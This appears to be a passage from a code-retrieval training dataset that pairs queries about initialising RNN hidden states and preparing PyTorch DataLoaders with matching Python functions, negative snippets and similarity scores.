[ "0.7023242", "0.69994956", "0.6996934", "0.69497895", "0.687699", "0.68541056", "0.6832711", "0.6771857", "0.67687964", "0.67646325", "0.6733643", "0.6710491", "0.66814333", "0.6609042", "0.6607835", "0.6601756", "0.658722", "0.656834", "0.65571326", "0.6551692", "0.65476173", "0.6544411", "0.65432537", "0.65428394", "0.65371364", "0.65188205", "0.6498316", "0.6486503", "0.6477267", "0.6477145", "0.6474538", "0.64730555", "0.64630795", "0.6453125", "0.6452071", "0.6443783", "0.64398044", "0.64324284", "0.64298886", "0.6426134", "0.6411013", "0.6399126", "0.6397751", "0.63956195", "0.6389112", "0.6382903", "0.63799745", "0.6375594", "0.6364413", "0.63630766", "0.635966", "0.6341943", "0.63385886", "0.63379854", "0.63362396", "0.6325991", "0.63230306", "0.632006", "0.63197786", "0.6313956", "0.6296524", "0.6293255", "0.6279486", "0.62739116", "0.6263689", "0.6259722", "0.62564385", "0.62537014", "0.6244613", "0.62433535", "0.62390465", "0.6215699", "0.6214239", "0.6210049", "0.62053406", "0.6188635", "0.61772424", "0.61731935", "0.61630523", "0.61606586", "0.61589915", "0.6158314", "0.61520755", "0.6144154", "0.61409837", "0.61382306", "0.6134817", "0.61300164", "0.61288196", "0.611556", "0.61060095", "0.61055493", "0.608203", "0.60664254", "0.60614306", "0.60553896", "0.6051843", "0.6051518", "0.605137", "0.6042697", "0.603825" ]
0.0
-1
Initializes hidden state vector
def init_hidden(self, batch_size): weight = next(self.parameters()).data if self.train_on_gpu: if self.rnn_type == 'LSTM': hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: if self.rnn_type == 'LSTM': hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def initialize_hidden_state(self):\n initializer = tf.keras.initializers.Zeros()\n rnnten = initializer(shape=(self.batch, self.units))\n return rnnten", "def initialize_hidden_state(self):\n return tf.zeros(shape=(self.batch_size, self.enc_units))", "def init_state(self) -> None:\n self.state = np.zeros(self.shape, dtype=int)", "def init_hidden(self):\n # TODO ========================\n # initialize the hidden states to zero\n\n initial_hidden = torch.zeros(self.num_layers, self.batch_size, self.hidden_size)\n return initial_hidden # a parameter tensor of shape (self.num_layers, self.batch_size, self.hidden_size)", "def init_hidden(self, batch_size):\r\n \r\n self.hidden_state = (\r\n torch.zeros(((1+self.bidirectional)*self.num_layers,\r\n batch_size,\r\n self.hidden_size)).to(self.device),\r\n torch.zeros(((1+self.bidirectional)*self.num_layers, \r\n batch_size, \r\n self.hidden_size)).to(self.device))", "def initialize_hidden_state(self, batch_size):\n return tf.zeros((batch_size, self.enc_units))", "def initialize_state(self):\n # Initialize everything to zero\n self.stateC = self.initializer((self.nSym, 1))\n self.stateC_prev = self.initializer((self.nSym, 1))\n self.state = self.toNeural(self.stateC)\n self.state_prev = self.toNeural(matrix=self.stateC_prev)\n self.inpC = self.initializer((self.nSym, 1))\n self.inpS = self.toNeural(self.inpC)\n\n # Create full traces\n self.create_full_traces()\n\n # Initialize Lotka Volterra\n self.LV_Matrices()\n\n # Allocate Temperature and Lambda\n self.vars['T'] = 0\n self.vars['lambda'] = 0", "def init_hidden(self):\n pass", "def init_hidden(self):\n pass", "def initialize_state(self):\n super(InverseChain, self).initialize_state()", "def initHidden(self, batch_size):\n zero_hidden = torch.zeros(self.n_layers, batch_size, self.hidden_size)\n return zero_hidden", "def init_hidden(self, batch_size):\n return torch.zeros(()), torch.zeros(())", "def init_hidden_state(self, encoder_out: torch.Tensor):\n pass", "def init_states(self):\n self.filtered_state_means = None\n self.filtered_state_covariances = None\n self.predicted_state_means = None\n self.predicted_state_covariances = None\n self.smoothed_state_means = None\n self.smoothed_state_covariances = None", "def init_hidden(self):\n return Variable(torch.randn(1, self.hidden_size))", "def init_hidden_state(self,batch_size):\n h = torch.zeros(batch_size,self.decoder_dim).to(device) # (batch_size, decoder_dim)\n c = torch.zeros(batch_size,self.decoder_dim).to(device)\n return h, c", "def init_hidden_state(self, batch_size):\n hidden_state = tf.tile(self.initial_hidden_state[None, ...], [batch_size, 1])\n cell_state = tf.tile(self.initial_cell_state[None, ...], [batch_size, 1])\n return hidden_state, cell_state", "def initial_state(self, trainable=False):\n if trainable:\n self.initial_state = torch.zeros(self.hidden_size, requires_grad=True)\n else:\n return torch.zeros(self.hidden_size, requires_grad=True)", "def init_hidden(self):\n h0 = torch.zeros(self.num_layers, self.batch_size, self.hidden_size)\n\n return h0 # a parameter tensor of shape (self.num_layers, self.batch_size, self.hidden_size)", "def init_hidden_state(self, batch_size):\n h = torch.zeros(batch_size, self.decoder_dim).to(device) # (batch_size, decoder_dim)\n c = torch.zeros(batch_size, self.decoder_dim).to(device)\n return h, c", "def init_hidden_state(self, batch_size):\n h = torch.zeros(batch_size, self.decoder_dim).to(device) # (batch_size, decoder_dim)\n c = torch.zeros(batch_size, self.decoder_dim).to(device)\n return 
h, c", "def init_hidden_state(self, batch_size):\n h = torch.zeros(batch_size, self.decoder_dim).to(device) # (batch_size, decoder_dim)\n c = torch.zeros(batch_size, self.decoder_dim).to(device)\n return h, c", "def init_state(self, x):\n B, _, d_model = x.shape\n p_0 = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n self.gru_hidden = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n return p_0", "def init_state(self, x):\n B, _, d_model = x.shape\n p_0 = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n self.gru_hidden = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n return p_0", "def init_hidden(self):\n if isinstance(self.rnn, nn.GRU):\n return torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device)\n elif isinstance(self.rnn, nn.LSTM):\n return (torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device),\n torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device))", "def init_hidden(self):\n if isinstance(self.rnn, nn.GRU):\n return torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device)\n elif isinstance(self.rnn, nn.LSTM):\n return (torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device),\n torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device))", "def init_hidden(self, mini_batch_size):\r\n #######################################\r\n ### BEGIN YOUR CODE HERE\r\n #######################################\r\n self.hidden = Variable(torch.zeros(2,mini_batch_size, self.hidden_size))\r\n if torch.cuda.is_available():\r\n self.hidden = self.hidden.cuda()\r\n #######################################\r\n ### END OF YOUR CODE\r\n #######################################\r", "def _initalize_state(self):\n\n self.memories.append(tf.tanh(\n tf.random_normal(shape=(self.memory_capacity, self.memory_vector_size), stddev=0.5)))\n self.ww_t.append(tf.nn.softmax(tf.range(self.memory_capacity, 0, -1, dtype=tf.float32)))\n self.rw_t.append(tf.nn.softmax(tf.range(self.memory_capacity, 0, -1, dtype=tf.float32)))\n self.r_t.append(tf.tanh(tf.random_normal(shape=(self.memory_vector_size,), stddev=0.5)))", "def init_hidden(self):\n if isinstance(self.rnn, nn.GRU) or isinstance(self.rnn, nn.RNN):\n return torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device)\n elif isinstance(self.rnn, nn.LSTM):\n return (torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device),\n torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device))", "def init_hidden(self):\n if isinstance(self.rnn, nn.GRU) or isinstance(self.rnn, nn.RNN):\n return torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device)\n elif isinstance(self.rnn, nn.LSTM):\n return (torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device),\n torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device))", "def _init_episode(self):\n # get states - one-hots\n self._states = np.zeros((self._size_state, self._size_state))\n\n # to_ones = np.random.permutation(self._size_state)[0:3]\n for x in xrange(self._size_state):\n # self._states[x][to_ones[x]] = 1\n self._states[x][x] = 1\n\n self._prob_transition = np.array([[.8,.2]])\n self._randomize()\n self._current_state = 0\n self._last_state = 0\n self._stage = 0\n self._since_flipped = 0", 
"def init_hidden(self, hidden_dim):\n enc_init_hx = mindspore.numpy.zeros(hidden_dim)\n\n enc_init_cx = mindspore.numpy.zeros(hidden_dim)\n\n return (enc_init_hx, enc_init_cx)", "def make_initial_state(self):\n return {\n 'h_rec':Variable(np.zeros((1, self.n_hidden), dtype=np.float32)),\n 'c_rec':Variable(np.zeros((1, self.n_hidden), dtype=np.float32)),\n 'h_gen':Variable(np.zeros((1, self.n_hidden), dtype=np.float32)),\n 'c_gen':Variable(np.zeros((1, self.n_hidden), dtype=np.float32))\n }", "def __init__(self, initial):\n self.initial = initial\n self.out = BitVec_Prop(initial)\n self.gen = BitVec_Prop( frozenset() )\n self.kill = BitVec_Prop( frozenset() )", "def init_hidden(self, batch_size):\n b = 2 if self.bidirectional else 1\n if self.rnn_type == \"LSTM\":\n h0 = (Variable(torch.zeros(b, batch_size, self.hidden_size)),\n Variable(torch.zeros(b, batch_size, self.hidden_size)))\n h0 = [h0[0].cuda(), h0[1].cuda()] if self.use_cuda else h0\n else:\n h0 = Variable(torch.zeros(b, batch_size, self.hidden_size))\n h0 = h0.cuda() if self.use_cuda else h0\n return h0", "def initial_state(self):\n h_0 = tf.zeros([1, self._num_units], self._dtype)\n context_0 = self._compute_context(h_0)\n h_0 = context_0 * 0\n\n if self._dec_init_states is None:\n batch_size = tf.shape(self._memory)[0]\n cell_states = self._cell.zero_state(batch_size, self._dtype)\n else:\n cell_states = self._dec_init_states\n\n attn_state_0 = AttnState(cell_states, h_0, context_0)\n\n return attn_state_0", "def reset_hidden(hidden, mask):\n if len(mask) != 0:\n hidden[:, mask, :] = 0\n \n return hidden", "def __init__(self, init_state):\n self._curr_state = init_state", "def set_zero_vector(self):\n self.vector = np.zeros(self.dimension, dtype = float)", "def __init__(self, state_0):\n self.state = state_0\n self.s_dot = 0\n self.hist = []\n self.time = 0.0\n control_frequency = 200 # Hz for attitude control loop\n self.dt = 1.0 / control_frequency\n self.desired_state = 0", "def _init_state(self, init_state=None, init_cov=None): \n ## Initialize the BMI state, assuming \n nS = self.n_states \n if init_state == None: \n init_state = np.mat( np.zeros([nS, 1]) ) \n if self.include_offset: init_state[-1,0] = 1 \n if init_cov == None: \n init_cov = np.mat( np.zeros([nS, nS]) )\n self.state = bmi.GaussianState(init_state, init_cov)", "def reset_reservoir(self):\n self.state = np.zeros((self.state_size,1),dtype=self.typefloat)", "def init_hidden(self, batch_size, device):\n if self.mode == 'LSTM':\n return (torch.ones((1+self.bidirectional , batch_size, self.hidden_dim), device=device),\n torch.ones((1+self.bidirectional, batch_size, self.hidden_dim), device=device))\n else:\n return torch.ones((1+self.bidirectional, batch_size, self.hidden_dim), device=device)", "def reset_states(self):\n K.batch_set_value([(v, 0) for v in self.variables])", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def 
init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def init_hidden(self, mini_batch_size):\n self.hidden = Variable(torch.zeros(1, mini_batch_size, 200))\n if torch.cuda.is_available():\n self.hidden = self.hidden.cuda()", "def initialize(self):\n\n for i, item in enumerate(self.v.items()):\n state, value = item\n if value == None:\n raise ValueError, \"state '%s' has no value\" % state\n self.S[i]=value\n self.storage=Storage()", "def init_hidden(self, batch=constants.BATCH_SIZE):\n\n return (Variable(torch.randn(constants.NUM_LAYERS * constants.NUM_DIRECTIONS, batch, self.hidden_dim)),\n Variable(torch.randn(constants.NUM_LAYERS * constants.NUM_DIRECTIONS, batch, self.hidden_dim)))", "def init_hidden(self, batch_size):\n return (\n autograd.Variable(\n torch.rand(2, batch_size, self.hidden_dim) * 2 * 0.08\n ), # https://github.com/xthan/polyvore/blob/master/polyvore/polyvore_model_bi.py#L55\n autograd.Variable(\n torch.rand(2, batch_size, self.hidden_dim) * 2 * 0.08))\n \"\"\"\n return (autograd.Variable(torch.randn(2, batch_size, self.hidden_dim)),\n autograd.Variable(torch.randn(2, batch_size, self.hidden_dim)))\n \"\"\"", "def initialize_state(self, state):\n print 'state initialized'\n return state", "def __init__(self, state):\n super().__init__()\n\n #store the list and the number of rows and columns\n self.state = state\n newMat = np.array(state)\n dim = newMat.shape\n self.__columns = dim[1]\n self.__rows = dim[0]", "def init_hidden(self, batch_size):\n return (torch.zeros(1,batch_size,self.hidden_dim).to(self.device),\n torch.zeros(1,batch_size,self.hidden_dim).to(self.device))", "def init_hidden(self, batch_size):\n return (torch.zeros(1,batch_size,self.hidden_dim).to(self.device),\n torch.zeros(1,batch_size,self.hidden_dim).to(self.device))", "def initial_state(self):\n return 0", "def initial_state():\r\n return [[EMPTY, EMPTY, EMPTY],\r\n [EMPTY, EMPTY, EMPTY],\r\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\r\n return [[EMPTY, EMPTY, EMPTY],\r\n [EMPTY, EMPTY, EMPTY],\r\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n\treturn [[EMPTY, EMPTY, EMPTY],\n\t\t\t[EMPTY, EMPTY, EMPTY],\n\t\t\t[EMPTY, EMPTY, EMPTY]]", "def __init__(self):\n self.action_space = [(0,0)] + list(permutations([i for i in range(m)], 2))\n self.state_space = [(X,T,D) for X in range(m) for T in range(t) for D in range(d)]\n self.state_init = random.choice(self.state_space)\n\n # Start the first round\n self.reset()", "def init_dense(self, layer):\n pass", "def __init__(self):\n self.state_dim = 12\n self.measurement_dim = 6", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, 
EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]", "def _init_state(self, encoder_hidden):\n if encoder_hidden is None:\n return None\n if isinstance(encoder_hidden, tuple):\n encoder_hidden = tuple([self._cat_directions(h) for h in encoder_hidden])\n else:\n encoder_hidden = self._cat_directions(encoder_hidden)\n return encoder_hidden", "def _init_state(self, encoder_hidden):\n if encoder_hidden is None:\n return None\n if isinstance(encoder_hidden, tuple):\n encoder_hidden = tuple([self._cat_directions(h) for h in encoder_hidden])\n else:\n encoder_hidden = self._cat_directions(encoder_hidden)\n return encoder_hidden", "def init_hidden_state(self, encoder_out):\n init_internal_state = []\n mean_encoder_out = encoder_out.mean(dim=1)\n h = self.init_h(mean_encoder_out)\n c = self.init_c(mean_encoder_out)\n init_internal_state.append((h, c))\n\n for i in range(1, self.decoder_number_layers):\n init_internal_state.append((\n Variable(torch.zeros(1, self.decoder_rnn_channels[i])).to(device),\n Variable(torch.zeros(1, self.decoder_rnn_channels[i])).to(device)\n ))\n return init_internal_state", "def __init__(self, hidden_size, eps=1e-12):\n super(MaskTransLayerNorm, self).__init__()\n\n self.gamma = 
nn.Parameter(torch.ones(hidden_size))\n self.beta = nn.Parameter(torch.zeros(hidden_size))\n self.variance_epsilon = eps", "def __init__(self, hidden_size):\n self.hidden_size = hidden_size", "def __init__(self, init_state):\n\n self.PUZZLE_TYPE = len(init_state) - 1\n self.initial_state = init_state\n self.current_state = init_state\n self.goal_state = [i for i in range(0, self.PUZZLE_TYPE + 1)]\n self.explored_states = []", "def init_hidden(self):\n\n weight = next(self.parameters()).data\n return Variable(weight.new(self.layers, self.batch_size, self.hidden_size).zero_())", "def init_game_setting(self):\n ##################\n # YOUR CODE HERE #\n ##################\n self.state = np.zeros((1, 80, 80))\n self.clear_action()" ]
[ "0.78422564", "0.76011795", "0.75708747", "0.7545913", "0.7402229", "0.7300602", "0.7254794", "0.69414794", "0.69414794", "0.69055253", "0.6872069", "0.68429536", "0.6835688", "0.67922854", "0.6773605", "0.6763473", "0.6744704", "0.67300737", "0.667231", "0.66509145", "0.66509145", "0.66509145", "0.6597272", "0.6597272", "0.65397716", "0.65397716", "0.65352505", "0.651785", "0.6493418", "0.6493418", "0.64909154", "0.6449154", "0.6446776", "0.6410173", "0.6405012", "0.6403049", "0.6395393", "0.63930243", "0.6366728", "0.6354577", "0.632665", "0.63251895", "0.6318795", "0.63147736", "0.6312861", "0.6312861", "0.6312861", "0.6312861", "0.6312861", "0.6312861", "0.6312861", "0.6312861", "0.627812", "0.6265179", "0.62457436", "0.6232031", "0.62292033", "0.6228181", "0.6228181", "0.6227047", "0.6225542", "0.6225542", "0.62224287", "0.62182564", "0.62140447", "0.61998147", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184946", "0.6184091", "0.6184091", "0.6178622", "0.6161697", "0.6153397", "0.615223", "0.61469287", "0.61459595" ]
0.0
-1
Prepares DataLoaders for 'rnn' generation method
def prepare_dataloaders(data, seq_len, batch_size=64, validation_set=False, validation_size=0.1, random_seed=42):
    # build vocabulary and token <-> id lookup tables
    vocab = set(data)
    token2id = {k: v for v, k in enumerate(vocab)}
    id2token = {k: v for v, k in token2id.items()}
    # encode the corpus and chop it into fixed-length sequences
    data_range = range(0, len(data) - seq_len, seq_len)
    data = [token2id[t] for t in data]
    data = np.array([data[i:i + seq_len] for i in data_range])
    tensor_data = torch.from_numpy(data)
    if validation_set:
        # reproducible train/validation split of the sequence indices
        np.random.seed(random_seed)
        idx = np.random.choice(
            range(len(tensor_data)), size=len(tensor_data), replace=False)
        split = int(len(idx) * (1 - validation_size))
        train_idx = idx[:split]
        valid_idx = idx[split:]
        train_data = TensorDataset(torch.LongTensor(tensor_data[train_idx]))
        valid_data = TensorDataset(torch.LongTensor(tensor_data[valid_idx]))
        train_loader = DataLoader(
            train_data, shuffle=True, batch_size=batch_size)
        valid_loader = DataLoader(
            valid_data, shuffle=True, batch_size=batch_size)
        return train_loader, valid_loader, vocab, token2id, id2token
    else:
        train_data = TensorDataset(torch.LongTensor(tensor_data))
        train_loader = DataLoader(
            train_data, shuffle=True, batch_size=batch_size)
        return train_loader, vocab, token2id, id2token
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_each_loader(data_path, batch_size, trn_negnum, shuffle=True, num_workers=0):\n \n dataset = ML_Dataset(data_path, trn_negnum)\n \n if data_path.endswith('trn') == True:\n collate = dataset.train_collate\n else:\n collate = test_collate\n\n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=collate)\n\n return data_loader", "def prepare(self):\n bcolz.set_nthreads(2)\n\n # step 0: load only when not loaded yet\n if TRAINING in self.data and VALIDATION in self.data: return\n\n # step 1: load the file names\n patients = sorted(glob.glob(self.location+'/*.*/'))\n print len(patients), \"patients\"\n\n # step 1: load the file names\n # make a stratified validation set\n # note, the seed decides the validation set, but it is deterministic in the names\n random.seed(317070)\n patient_names = [self.patient_name_from_file_name(f) for f in patients]\n validation_patients = random.sample(patient_names, int(VALIDATION_SET_SIZE*len(patient_names)))\n\n labels_as_dict = defaultdict(list)\n\n with open(paths.LUNA_LABELS_PATH, 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n next(reader) # skip the header\n for row in reader:\n label = (float(row[1]), float(row[2]), float(row[3]), float(row[4]))\n labels_as_dict[str(row[0])].append(label)\n\n # make the static data empty\n for s in self.datasets:\n self.data[s] = []\n self.labels[s] = []\n self.names[s] = []\n self.spacings[s] = []\n self.origins[s] = []\n\n with gzip.open(paths.INTERMEDIATE_DATA_PATH + 'spacings.pkl.gz') as f:\n spacings = cPickle.load(f)\n\n with gzip.open(paths.INTERMEDIATE_DATA_PATH + 'origins.pkl.gz') as f:\n origins = cPickle.load(f)\n\n # load the filenames and put into the right dataset\n for i, patient_folder in enumerate(patients):\n patient_id = str(patient_folder.split(path.sep)[-2])\n if patient_id in validation_patients:\n dataset = VALIDATION\n else:\n dataset = TRAIN\n\n\n label = labels_as_dict[patient_id]\n if self.only_positive and not label:\n continue\n\n self.data[dataset].append(patient_folder)\n self.labels[dataset].append(label)\n self.names[dataset].append(patient_id)\n self.spacings[dataset].append(spacings[patient_id])\n self.origins[dataset].append(origins[patient_id])\n\n # give every patient a unique number\n last_index = -1\n for set in self.datasets:\n self.indices[set] = range(last_index+1,last_index+1+len(self.data[set]))\n if len(self.indices[set]) > 0:\n last_index = self.indices[set][-1]\n print set, len(self.indices[set]), \"samples\"", "def _init_train_loader(self):\n # Choose the right dataset type\n if self.config_args[\"num_members\"] > 1:\n class_dataset_wrapper = dataset_wrapper.MixMoDataset\n else:\n class_dataset_wrapper = dataset_wrapper.MSDADataset\n\n # Load augmentations\n self.traindatasetwrapper = class_dataset_wrapper(\n dataset=self.train_dataset,\n num_classes=int(self.config_args[\"data\"][\"num_classes\"]),\n num_members=self.config_args[\"num_members\"],\n dict_config=self.config_args[\"training\"][\"dataset_wrapper\"],\n properties=self.properties\n )\n\n # Build standard sampler\n _train_sampler = torch.utils.data.sampler.RandomSampler(\n data_source=self.traindatasetwrapper, ## only needed for its length\n num_samples=None,\n replacement=False,\n )\n\n # Wrap it with the repeating sampler used for multi-input models\n batch_sampler = batch_repetition_sampler.BatchRepetitionSampler(\n sampler=_train_sampler,\n batch_size=self.batch_size,\n 
num_members=self.config_args[\"num_members\"],\n drop_last=True,\n config_batch_sampler=self.config_args[\"training\"][\"batch_sampler\"]\n )\n\n self.train_loader = torch.utils.data.DataLoader(\n self.traindatasetwrapper,\n batch_sampler=batch_sampler,\n num_workers=self.num_workers,\n batch_size=1,\n shuffle=False,\n sampler=None,\n drop_last=False,\n pin_memory=True,\n )", "def prepare(self):\n\n # step 0: load only when not loaded yet\n if TRAINING in self.data \\\n and VALIDATION in self.data:\n return\n\n # step 1: load the file names\n file_list = sorted(glob.glob(self.location+\"*.mhd\"))\n # count the number of data points\n\n # make a stratified validation set\n # note, the seed decides the validation set, but it is deterministic in the names\n random.seed(317070)\n patient_names = [self.patient_name_from_file_name(f) for f in file_list]\n validation_patients = random.sample(patient_names, int(VALIDATION_SET_SIZE*len(patient_names)))\n\n # make the static data empty\n for s in self.datasets:\n self.data[s] = []\n self.labels[s] = []\n self.names[s] = []\n\n # load the filenames and put into the right dataset\n labels_as_dict = defaultdict(list)\n\n with open(paths.LUNA_LABELS_PATH, 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n next(reader) # skip the header\n for row in reader:\n label = (float(row[1]), float(row[2]), float(row[3]), float(row[4]))\n labels_as_dict[str(row[0])].append(label)\n\n for patient_file in file_list:\n patient_name = self.patient_name_from_file_name(patient_file)\n\n if patient_name in validation_patients:\n s = VALIDATION\n else:\n s = TRAINING\n label = labels_as_dict[str(patient_name)]\n if self.only_positive and not label:\n continue\n self.data[s].append(patient_file)\n \n if self.pick_nodule:\n self.labels[s].append([random.choice(label)]) \n else:\n self.labels[s].append(label)\n \n \n self.names[s].append(patient_name)\n\n # give every patient a unique number\n last_index = -1\n for s in self.datasets:\n self.indices[s] = range(last_index+1,last_index+1+len(self.data[s]))\n if len(self.indices[s]) > 0:\n last_index = self.indices[s][-1]\n print s, len(self.indices[s]), \"samples\"", "def prepare_data(self,d):\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n #CONVERT TO FLOAT32\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape((-1,1))\n train = data_utils.TensorDataset(features,target)\n train_loaders[domain] = DataLoader(train, opt.batch_size, shuffle = True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape(-1,1))\n uset = data_utils.TensorDataset(features,target)\n unlabeled_loaders[domain] = DataLoader(uset,opt.batch_size, shuffle = True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n \n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters", "def create_dataloaders(data_dir):\n\n trng_dataset = datasets.ImageFolder(data_dir / TRNG_FOLDER,\n transform=flowernet.trng_transform)\n trng_dataloader = torch.utils.data.DataLoader(trng_dataset,\n batch_size=64,\n shuffle=True)\n\n valn_dataset = datasets.ImageFolder(data_dir / VALN_FOLDER,\n transform=flowernet.pred_transform)\n valn_dataloader = torch.utils.data.DataLoader(valn_dataset,\n batch_size=64,\n shuffle=True)\n\n return 